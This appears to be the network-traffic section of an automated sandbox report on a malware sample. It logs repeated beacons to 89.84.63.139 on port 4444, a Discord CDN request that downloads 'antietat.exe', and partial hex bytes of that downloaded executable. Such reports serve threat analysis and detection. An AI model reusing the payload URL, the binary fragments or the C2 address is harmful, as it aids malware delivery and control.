Dec 5, 2024 11:41:07.571118116 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.571177959 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.579181910 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.579236031 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.587357044 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.587486029 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.591701984 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.591790915 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.635412931 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.635482073 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.707684040 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.707746983 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.709098101 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.709180117 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.710400105 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.710493088 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.716435909 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.716501951 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.722187996 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.722255945 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.727994919 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.728085041 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.731204033 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.731286049 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.736668110 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.736737967 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.739948988 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.740051985 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.745604038 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.745887041 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.751230955 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.751296997 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.757015944 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.757110119 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.760159016 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.760256052 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.764230013 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.764321089 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.767971039 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.768066883 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.770163059 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.770224094 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.774177074 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.774250031 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.777981997 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.778100967 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.780991077 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.781060934 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.784949064 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.785032988 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.787772894 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.787848949 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.896584988 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.896677017 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.898333073 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.898399115 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.899157047 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.899241924 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.900728941 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.900795937 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.902493000 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.902556896 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.903328896 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.903390884 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.903402090 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.903486967 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.903500080 CET	443	49701	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:07.903510094 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:07.903548956 CET	49701	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:08.118427992 CET	49702	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:08.238257885 CET	4444	49702	89.84.63.139	192.168.2.7
Dec 5, 2024 11:41:08.238367081 CET	49702	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:16.540436029 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:16.540467978 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:16.540610075 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:16.547693014 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:16.547708988 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:17.757827997 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:17.757997036 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:17.764847994 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:17.764867067 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:17.765109062 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:17.765176058 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:17.766555071 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:17.807342052 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:18.238167048 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:18.238240004 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:18.238272905 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:18.238297939 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:18.238308907 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:18.238368034 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:18.238882065 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:18.238950968 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:18.238959074 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:18.239082098 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:18.239716053 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:18.239808083 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:18.240633011 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:18.240717888 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:18.240830898 CET	443	49709	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:18.240894079 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:18.243331909 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:18.243331909 CET	49709	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:24.750097036 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:24.750138998 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:24.750219107 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:24.762271881 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:24.762284994 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:25.971931934 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:25.973193884 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.031155109 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.031181097 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.031526089 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.033426046 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.062786102 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.107337952 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.462053061 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.462150097 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.462161064 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.462260008 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.462490082 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.462527990 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.462527990 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.462539911 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.462563038 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.462635994 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.463408947 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.463474989 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.463479996 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.463514090 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.470312119 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.470354080 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.470525026 CET	443	49735	162.159.134.233	192.168.2.7
Dec 5, 2024 11:41:26.470583916 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.475395918 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:26.475411892 CET	49735	443	192.168.2.7	162.159.134.233
Dec 5, 2024 11:41:30.137644053 CET	4444	49702	89.84.63.139	192.168.2.7
Dec 5, 2024 11:41:30.137749910 CET	49702	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:30.138410091 CET	49746	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:30.139064074 CET	49702	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:30.258167982 CET	4444	49746	89.84.63.139	192.168.2.7
Dec 5, 2024 11:41:30.258285046 CET	49746	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:30.258866072 CET	4444	49702	89.84.63.139	192.168.2.7
Dec 5, 2024 11:41:52.187674999 CET	4444	49746	89.84.63.139	192.168.2.7
Dec 5, 2024 11:41:52.187746048 CET	49746	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:52.188213110 CET	49796	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:52.188785076 CET	49746	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:52.308007956 CET	4444	49796	89.84.63.139	192.168.2.7
Dec 5, 2024 11:41:52.308106899 CET	49796	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:41:52.308444977 CET	4444	49746	89.84.63.139	192.168.2.7
Dec 5, 2024 11:42:14.201180935 CET	4444	49796	89.84.63.139	192.168.2.7
Dec 5, 2024 11:42:14.201283932 CET	49796	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:14.201802969 CET	49847	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:14.202404976 CET	49796	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:14.321573019 CET	4444	49847	89.84.63.139	192.168.2.7
Dec 5, 2024 11:42:14.321661949 CET	49847	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:14.327406883 CET	4444	49796	89.84.63.139	192.168.2.7
Dec 5, 2024 11:42:36.217164040 CET	4444	49847	89.84.63.139	192.168.2.7
Dec 5, 2024 11:42:36.217288971 CET	49847	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:36.217761993 CET	49898	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:36.218626022 CET	49847	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:36.413256884 CET	4444	49898	89.84.63.139	192.168.2.7
Dec 5, 2024 11:42:36.413274050 CET	4444	49847	89.84.63.139	192.168.2.7
Dec 5, 2024 11:42:36.413388014 CET	49898	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:58.311127901 CET	4444	49898	89.84.63.139	192.168.2.7
Dec 5, 2024 11:42:58.311217070 CET	49898	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:58.311635971 CET	49949	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:58.312338114 CET	49898	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:58.431488037 CET	4444	49949	89.84.63.139	192.168.2.7
Dec 5, 2024 11:42:58.431617022 CET	49949	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:42:58.432009935 CET	4444	49898	89.84.63.139	192.168.2.7
Dec 5, 2024 11:43:07.739624977 CET	49970	4444	192.168.2.7	89.84.63.139
Dec 5, 2024 11:43:07.859498024 CET	4444	49970	89.84.63.139	192.168.2.7
Dec 5, 2024 11:43:07.859571934 CET	49970	4444	192.168.2.7	89.84.63.139

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 11:41:03.130563021 CET	53927	53	192.168.2.7	1.1.1.1
Dec 5, 2024 11:41:03.270436049 CET	53	53927	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 11:41:03.130563021 CET	192.168.2.7	1.1.1.1	0x7f09	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 11:41:03.270436049 CET	1.1.1.1	192.168.2.7	0x7f09	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Dec 5, 2024 11:41:03.270436049 CET	1.1.1.1	192.168.2.7	0x7f09	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Dec 5, 2024 11:41:03.270436049 CET	1.1.1.1	192.168.2.7	0x7f09	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Dec 5, 2024 11:41:03.270436049 CET	1.1.1.1	192.168.2.7	0x7f09	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false
Dec 5, 2024 11:41:03.270436049 CET	1.1.1.1	192.168.2.7	0x7f09	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	162.159.134.233	443	4900	C:\Users\user\Desktop\sNifdpWiY9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 10:41:04 UTC	250	OUT	GET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1 User-Agent: Downloader Host: cdn.discordapp.com Cache-Control: no-cache
2024-12-05 10:41:05 UTC	1205	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 10:41:04 GMT Content-Type: application/x-msdos-program Content-Length: 46592 Connection: close CF-Ray: 8ed36bf53acd4380-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 13424 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="antietat.exe" ETag: "2eddba95f5818ef402bfe7fbaa0f6a18" Expires: Fri, 05 Dec 2025 10:41:04 GMT Last-Modified: Thu, 05 Dec 2024 05:13:43 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1733375623321737 x-goog-hash: crc32c=C+Z3jw== x-goog-hash: md5=Lt26lfWBjvQCv+f7qg9qGA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 46592 x-guploader-uploadid: AFiumC5KewGqCdjqrDiVmKhof3L_YhJd69mxK8gUrus2hdwbkNR2Kd9X2RkSjYVGnr87jIWq51Q X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A; path=/; expires=Thu, 05-Dec-24 11:11:04 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
2024-12-05 10:41:05 UTC	513	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 52 74 6d 44 62 72 6c 42 7a 30 75 6c 4f 69 64 4c 44 33 33 6f 69 50 55 7a 25 32 46 4e 6a 4b 39 42 67 31 74 62 34 4a 59 67 67 61 4e 73 48 67 68 64 65 78 39 50 47 4c 6e 6c 6d 79 6a 30 6f 6b 53 50 6d 32 6f 33 5a 43 61 73 64 76 32 38 54 63 38 31 64 56 52 65 25 32 42 45 77 79 72 34 50 64 74 59 75 53 75 72 58 53 6c 53 5a 48 6a 4f 39 69 41 69 38 42 73 72 4a 76 54 58 52 4b 4f 37 43 6f 4e 4d 6a 41 6c 55 4e 41 54 64 65 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtmDbrlBz0ulOidLD33oiPUz%2FNjK9Bg1tb4JYggaNsHghdex9PGLnlmyj0okSPm2o3ZCasdv28Tc81dVRe%2BEwyr4PdtYuSurXSlSZHjO9iAi8BsrJvTXRKO7CoNMjAlUNATdeg%3D%3D"}],"group":"cf-nel","max_age":60
2024-12-05 10:41:05 UTC	1020	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 04 fb 50 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 7a 00 00 00 b2 00 00 00 0c 00 00 e0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 40 01 00 00 04 00 00 e1 cf 00 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdPg.+z@@`
2024-12-05 10:41:05 UTC	1369	IN	Data Raw: 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 d5 9a 00 00 31 c9 c7 00 01 00 00 00 48 8b 05 d6 9a 00 00 c7 00 01 00 00 00 48 8b 05 d9 9a 00 00 c7 00 01 00 00 00 48 8b 05 2c 9a 00 00 66 81 38 4d 5a 75 0f 48 63 50 3c 48 01 d0 81 38 50 45 00 00 74 66 48 8b 05 7f 9a 00 00 89 0d a5 cf 00 00 8b 00 85 c0 74 43 b9 02 00 00 00 e8 81 74 00 00 e8 14 73 00 00 48 8b 15 3d 9b 00 00 8b 12 89 10 e8 14 73 00 00 48 8b 15 0d 9b 00 00 8b 12 89 10 e8 c4 07 00 00 48 8b 05 ad 99 00 00 83 38 01 74 50 31 c0 48 83 c4 28 c3 90 b9 01 00 00 00 e8 3e 74 00 00 eb bb 0f 1f 40 00 0f b7 50 18 66 81 fa 0b 01 74 45 66 81 fa 0b 02 75 88 83 b8 84 00 00 00 0e 0f 86 7b ff ff ff 8b 90 f8 00 00 00 31 c9 85 d2 0f 95 c1 e9 69 ff ff ff 0f 1f 80 00 00 00 00 48 8b 0d Data Ascii: ff.@H(H1HHH,f8MZuHcP<H8PEtfHtCtsH=sHH8tP1H(>t@PftEfu{1iH
2024-12-05 10:41:05 UTC	1369	IN	Data Raw: 8b 4c 24 40 41 b8 01 00 00 00 48 89 74 24 20 ff 15 fe dc 00 00 85 c0 74 4c 8b 54 24 78 48 8b 84 24 90 00 00 00 48 8b 4c 24 40 89 10 ff 15 f9 dc 00 00 48 8b 4c 24 38 31 d2 ff 15 fc dc 00 00 90 48 83 c4 58 5b 5e c3 ff 15 0e dd 00 00 48 8d 0d 6f 8a 00 00 89 c2 e8 d0 12 00 00 b9 01 00 00 00 e8 96 6f 00 00 ff 15 f0 dc 00 00 48 8d 0d 29 8b 00 00 89 c2 e8 b2 12 00 00 48 8b 4c 24 40 ff 15 a7 dc 00 00 48 8b 4c 24 38 31 d2 ff 15 aa dc 00 00 b9 01 00 00 00 e8 60 6f 00 00 ff 15 ba dc 00 00 48 8d 0d bb 8a 00 00 89 c2 e8 7c 12 00 00 48 8b 4c 24 48 ff 15 69 dc 00 00 eb c8 ff 15 99 dc 00 00 48 8d 0d 6a 8a 00 00 89 c2 eb dd ff 15 88 dc 00 00 48 8d 0d 21 8a 00 00 89 c2 e8 4a 12 00 00 eb a1 0f 1f 84 00 00 00 00 00 41 54 55 57 56 53 48 83 ec 20 48 89 ce 48 8d 0d cc 8a 00 00 Data Ascii: L$@AHt$ tLT$xH$HL$@HL$81HX[^HooH)HL$@HL$81`oH\|HL$HiHjH!JATUWVSH HH
2024-12-05 10:41:05 UTC	1369	IN	Data Raw: 48 89 cb 85 f6 0f 8e 17 01 00 00 48 8b 05 e8 c5 00 00 45 31 c9 48 83 c0 18 66 0f 1f 84 00 00 00 00 00 4c 8b 00 4c 39 c3 72 13 48 8b 50 08 8b 52 08 49 01 d0 4c 39 c3 0f 82 8a 00 00 00 41 83 c1 01 48 83 c0 28 41 39 f1 75 d8 48 89 d9 e8 60 0a 00 00 48 89 c7 48 85 c0 0f 84 e6 00 00 00 48 8b 05 95 c5 00 00 48 8d 1c b6 48 c1 e3 03 48 01 d8 48 89 78 20 c7 00 00 00 00 00 e8 73 0b 00 00 8b 57 0c 41 b8 30 00 00 00 48 8d 0c 10 48 8b 05 67 c5 00 00 48 8d 54 24 20 48 89 4c 18 18 ff 15 b7 d7 00 00 48 85 c0 0f 84 7d 00 00 00 8b 44 24 44 8d 50 fc 83 e2 fb 74 08 8d 50 c0 83 e2 bf 75 12 83 05 2f c5 00 00 01 48 83 c4 50 5b 5e 5f c3 0f 1f 00 83 f8 02 48 8b 4c 24 20 48 8b 54 24 38 41 b8 40 00 00 00 b8 04 00 00 00 44 0f 44 c0 48 03 1d 05 c5 00 00 48 89 4b 08 49 89 d9 48 89 53 Data Ascii: HHE1HfLL9rHPRIL9AH(A9uH`HHHHHHHx sWA0HHgHT$ HLH}D$DPtPu/HP[^_HL$ HT$8A@DDHHKIHS
2024-12-05 10:41:05 UTC	1369	IN	Data Raw: 77 6b 48 8d 15 70 86 00 00 48 63 04 82 48 01 d0 ff e0 0f 1f 80 00 00 00 00 31 d2 b9 08 00 00 00 e8 94 65 00 00 48 83 f8 01 0f 84 3e 01 00 00 48 85 c0 0f 85 01 01 00 00 48 8b 05 8a c0 00 00 48 85 c0 74 45 48 89 d9 48 83 c4 20 5b 48 ff e0 66 2e 0f 1f 84 00 00 00 00 00 3d 05 00 00 c0 0f 84 a5 00 00 00 77 33 3d 02 00 00 80 75 cb b8 ff ff ff ff 48 83 c4 20 5b c3 90 f6 42 04 01 0f 85 67 ff ff ff eb e8 0f 1f 40 00 31 c0 48 83 c4 20 5b c3 0f 1f 84 00 00 00 00 00 3d 08 00 00 c0 74 cd 3d 1d 00 00 c0 75 91 31 d2 b9 04 00 00 00 e8 06 65 00 00 48 83 f8 01 0f 84 9c 00 00 00 48 85 c0 0f 84 72 ff ff ff b9 04 00 00 00 ff d0 eb 9e 66 2e 0f 1f 84 00 00 00 00 00 31 d2 b9 08 00 00 00 e8 d4 64 00 00 48 83 f8 01 0f 85 40 ff ff ff ba 01 00 00 00 b9 08 00 00 00 e8 bb 64 00 00 e9 Data Ascii: wkHpHcH1eH>HHHtEHH [Hf.=w3=uH [Bg@1H [=t=u1eHHrf.1dH@d
2024-12-05 10:41:05 UTC	1369	IN	Data Raw: 48 8b 15 09 85 00 00 31 c0 66 81 3a 4d 5a 75 10 4c 63 42 3c 49 01 d0 41 81 38 50 45 00 00 74 08 c3 0f 1f 80 00 00 00 00 66 41 81 78 18 0b 02 75 ef 41 0f b7 40 14 48 29 d1 49 8d 44 00 18 45 0f b7 40 06 66 45 85 c0 74 34 41 8d 50 ff 48 8d 14 92 4c 8d 4c d0 28 66 2e 0f 1f 84 00 00 00 00 00 44 8b 40 0c 4c 89 c2 4c 39 c1 72 08 03 50 08 48 39 d1 72 ac 48 83 c0 28 4c 39 c8 75 e3 31 c0 c3 48 8b 05 89 84 00 00 31 c9 66 81 38 4d 5a 75 0f 48 63 50 3c 48 01 d0 81 38 50 45 00 00 74 09 89 c8 c3 66 0f 1f 44 00 00 66 81 78 18 0b 02 75 ef 0f b7 48 06 89 c8 c3 66 0f 1f 84 00 00 00 00 00 4c 8b 05 49 84 00 00 31 c0 66 41 81 38 4d 5a 75 0f 49 63 50 3c 4c 01 c2 81 3a 50 45 00 00 74 08 c3 0f 1f 80 00 00 00 00 66 81 7a 18 0b 02 75 f0 0f b7 42 14 44 0f b7 42 06 48 8d 44 02 18 66 Data Ascii: H1f:MZuLcB<IA8PEtfAxuA@H)IDE@fEt4APHLL(f.D@LL9rPH9rH(L9u1H1f8MZuHcP<H8PEtfDfxuHfLI1fA8MZuIcP<L:PEtfzuBDBHDf
